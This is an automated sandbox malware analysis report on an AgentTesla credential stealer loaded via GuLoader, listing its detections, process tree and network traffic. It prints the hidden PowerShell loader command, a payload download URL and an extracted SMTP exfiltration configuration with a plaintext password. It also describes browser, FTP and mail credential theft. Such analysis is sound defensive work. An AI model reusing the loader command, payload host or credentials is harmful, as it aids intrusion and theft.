Edit tour

Windows Analysis Report
KWOTASIE.exe

Overview

General Information

Sample name:	KWOTASIE.exe
Analysis ID:	1465894
MD5:	ecbec21dcfa39a1131d2a79acdf73f88
SHA1:	6b9366674e34118ec2881ab8d0ae5a5f5077a44d
SHA256:	ca595e27f24e0fc84bd5627ec36baae36bcc24018e638ed2ec7c7a6b1fe7b653
Tags:	AgentTeslaexeGuLoader
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

AI detected suspicious sample

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found suspicious powershell code related to unpacking or dynamic code loading

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

KWOTASIE.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\KWOTASIE.exe" MD5: ECBEC21DCFA39A1131D2A79ACDF73F88)

powershell.exe (PID: 2888 cmdline: "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wab.exe (PID: 5032 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.lumies.co.za", "Username": "books@lumies.co.za", "Password": "vj$)KFsCyFOr"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.3292987188.0000000021B71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: wab.exe PID: 5032	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wab.exe PID: 5032	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Signatures

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 102.130.125.173, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 5032, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49717

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)", CommandLine: "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\KWOTASIE.exe", ParentImage: C:\Users\user\Desktop\KWOTASIE.exe, ParentProcessId: 6756, ParentProcessName: KWOTASIE.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)", ProcessId: 2888, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: KWOTASIE.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://zakk.co.za/GHAchl0.bin

Avira URL Cloud: Label: malware

Found malware configuration

Source: wab.exe.5032.6.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.lumies.co.za", "Username": "books@lumies.co.za", "Password": "vj$)KFsCyFOr"}

Multi AV Scanner detection for submitted file

Source: KWOTASIE.exe

Virustotal: Detection: 9%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: KWOTASIE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: KWOTASIE.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\KWOTASIE.exe	Code function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040595A
Source: C:\Users\user\Desktop\KWOTASIE.exe	Code function: 0_2_0040658F FindFirstFileW,FindClose,	0_2_0040658F
Source: C:\Users\user\Desktop\KWOTASIE.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862

Source: global traffic

TCP traffic: 192.168.2.5:49717 -> 102.130.125.173:587

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: xneeloZA xneeloZA

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

TCP traffic: 192.168.2.5:49717 -> 102.130.125.173:587

Source: global traffic

HTTP traffic detected: GET /GHAchl0.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: zakk.co.zaCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /GHAchl0.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: zakk.co.zaCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: zakk.co.za
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: mail.lumies.co.za

Source: wab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: wab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.lumies.co.za
Source: KWOTASIE.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.len
Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: KWOTASIE.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: KWOTASIE.exe	String found in binary or memory: http://s.symcd.com06
Source: wab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: KWOTASIE.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: KWOTASIE.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: KWOTASIE.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: wab.exe, 00000006.00000002.3277621644.00000000007B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zakk.co.za/GHAchl0.bin
Source: KWOTASIE.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: KWOTASIE.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: KWOTASIE.exe	String found in binary or memory: https://d.symcb.com/rpa0.

Source: C:\Users\user\Desktop\KWOTASIE.exe

Code function: 0_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004053EF

Source: C:\Users\user\Desktop\KWOTASIE.exe

Code function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040333D

Source: C:\Users\user\Desktop\KWOTASIE.exe	File created: C:\Windows\resources\0809			Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	File created: C:\Windows\resources\0809\xanthochroi.ini			Jump to behavior

Source: C:\Users\user\Desktop\KWOTASIE.exe	Code function: 0_2_00406956	0_2_00406956
Source: C:\Users\user\Desktop\KWOTASIE.exe	Code function: 0_2_00404C2C	0_2_00404C2C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_00334AC8	6_2_00334AC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_0033EC60	6_2_0033EC60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_0033AD20	6_2_0033AD20
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_00333EB0	6_2_00333EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 6_2_003341F8	6_2_003341F8

Source: KWOTASIE.exe

Static PE information: invalid certificate

Source: KWOTASIE.exe, 00000000.00000000.2026782822.00000000004A0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerumkapsel.exe2 vs KWOTASIE.exe
Source: KWOTASIE.exe	Binary or memory string: OriginalFilenamerumkapsel.exe2 vs KWOTASIE.exe

Source: KWOTASIE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/11@3/3

Source: C:\Users\user\Desktop\KWOTASIE.exe

0_2_0040333D

Source: C:\Users\user\Desktop\KWOTASIE.exe

Code function: 0_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046B0

Source: C:\Users\user\Desktop\KWOTASIE.exe

Code function: 0_2_004020FE CoCreateInstance,

0_2_004020FE

Source: C:\Users\user\Desktop\KWOTASIE.exe

File created: C:\Users\user\AppData\Local\Innoxious

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4292:120:WilError_03

Source: C:\Users\user\Desktop\KWOTASIE.exe

File created: C:\Users\user\AppData\Local\Temp\nsh1BD7.tmp

Jump to behavior

Source: KWOTASIE.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\KWOTASIE.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\KWOTASIE.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: KWOTASIE.exe

Virustotal: Detection: 9%

Source: C:\Users\user\Desktop\KWOTASIE.exe

File read: C:\Users\user\Desktop\KWOTASIE.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\KWOTASIE.exe "C:\Users\user\Desktop\KWOTASIE.exe"
Source: C:\Users\user\Desktop\KWOTASIE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Users\user\Desktop\KWOTASIE.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Smitten=cat 'C:\Users\user\AppData\Local\Innoxious\Phantasies.ude';$Nebengeschftens=$Smitten.substring(78762,3);.$Nebengeschftens($Smitten)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KWOTASIE.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
